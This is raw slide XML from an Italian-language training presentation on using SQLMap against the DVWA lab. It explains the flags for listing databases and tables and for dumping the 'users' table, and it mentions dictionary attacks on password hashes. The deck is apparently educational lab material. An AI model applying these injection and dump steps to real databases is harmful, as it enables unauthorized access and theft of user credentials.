            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3207410" w="7270129">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7270128" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7270128" y="3207409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3207409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 12" id="12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-1188667" y="-2591193"/>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Freeform 13" id="13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="15004884" y="2542725"/>
            <a:ext cx="2973307" cy="2281338"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2281338" w="2973307">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2973308" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973308" y="2281338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2281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15" id="15"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12314662"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6" id="16"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="484643" y="6477490"/>
            <a:ext cx="9769895" cy="8153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Vediamo come SQLMap ci riporta l’esistenza di ben 7 database. Per l’obiettivo di questo esecizio, ci concentremo sul database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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46407" y="-361404"/>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10800000">
            <a:off x="11496334" y="-2996042"/>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4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="5535072" y="389279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10800000">
            <a:off x="-2926398" y="8586643"/>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TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1470937"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3.6.1 -   SQLMAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 7" id="7"/>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10289725" y="3386647"/>
            <a:ext cx="6659025" cy="1012298"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1012298" w="6659025">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6659025" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6659025" y="1012298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1012298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 9" id="9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9769895" y="7023241"/>
            <a:ext cx="7426787" cy="1968710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1968710" w="7426787">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7426787" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7426787" y="1968710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1968710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="361296" y="2208776"/>
            <a:ext cx="9769895" cy="33299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Una volta individuato il database interessato, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>vediamo quali tabelle sono presenti.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Il comando è il seguente:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Sqlmap:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> attiva sqlmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>-r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> indica il file da leggere e analizzare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>-D:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> indica il database da analizzare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>--tables:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>ci riporta le tabelle di quel database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 11" id="11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="15227658" y="-2100277"/>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3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 12" id="12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-1374136" y="-2814714"/>
            <a:ext cx="6259084" cy="5993073"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5993073" w="6259084">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6259084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6259084" y="5993073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5993073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 13" id="13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="6168655">
            <a:off x="14910289" y="5323651"/>
            <a:ext cx="2432673" cy="425718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 14" id="14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="5095585">
            <a:off x="9744277" y="5330060"/>
            <a:ext cx="2285285" cy="399925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 15" id="15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="-587605">
            <a:off x="7814907" y="7440813"/>
            <a:ext cx="1564869" cy="1408382"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1408382" w="1564869">
                <a:moveTo>
                  <a:pt x="0" y="1408382"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1564869" y="1408382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1564869" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="140838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085790" y="7517547"/>
            <a:ext cx="3522945" cy="140918"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="140918" w="3522945">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3522945" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3522945" y="140918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1409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18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12314662"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0" y="7100816"/>
            <a:ext cx="9769895" cy="3962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Scopriamo così che le tabelle sono due: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>guestbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a: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5559741" y="407488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800000">
            <a:off x="-2306209" y="325573"/>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4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="14287674" y="-2248904"/>
            <a:ext cx="6259084" cy="5993073"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5993073" w="6259084">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6259084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6259084" y="5993073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5993073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="11100719" y="-3538714"/>
            <a:ext cx="9990407" cy="9266102"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9266102" w="9990407">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9990407" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9990407" y="9266103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9266103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-2951067" y="9030692"/>
            <a:ext cx="6259084" cy="5993073"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5993073" w="6259084">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6259083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6259083" y="5993072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5993072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="361296" y="9733022"/>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8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12734041" y="9733022"/>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9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1470937"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3.6.1 -   SQLMAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 10" id="1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TextBox 11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="361296" y="1459005"/>
            <a:ext cx="8481381" cy="41681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Per concludere, cheidiamo a SQLMap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>di restituirci la tabella users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Il comando è il seguente:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Sqlmap:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> attiva sqlmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>-r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> indica il file da leggere e analizzare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>-D:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> indica il database da analizzare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>-T:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> indica la tabella da analizzare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>--dump all:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>indica al tool di scaricare tutte le informazioni sulla tabella</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7071357" y="5356473"/>
            <a:ext cx="9769895" cy="12344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Avremo così ottenuto la tabella</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> permette anche di effettuare attacchi a dizionario sulle password cifrate in hash ma non ci siamo avvalsi di questa funzione. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 13" id="13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8595984" y="3094257"/>
            <a:ext cx="8663316" cy="935735"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="935735" w="8663316">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8663316" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8663316" y="935735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="935735"/>
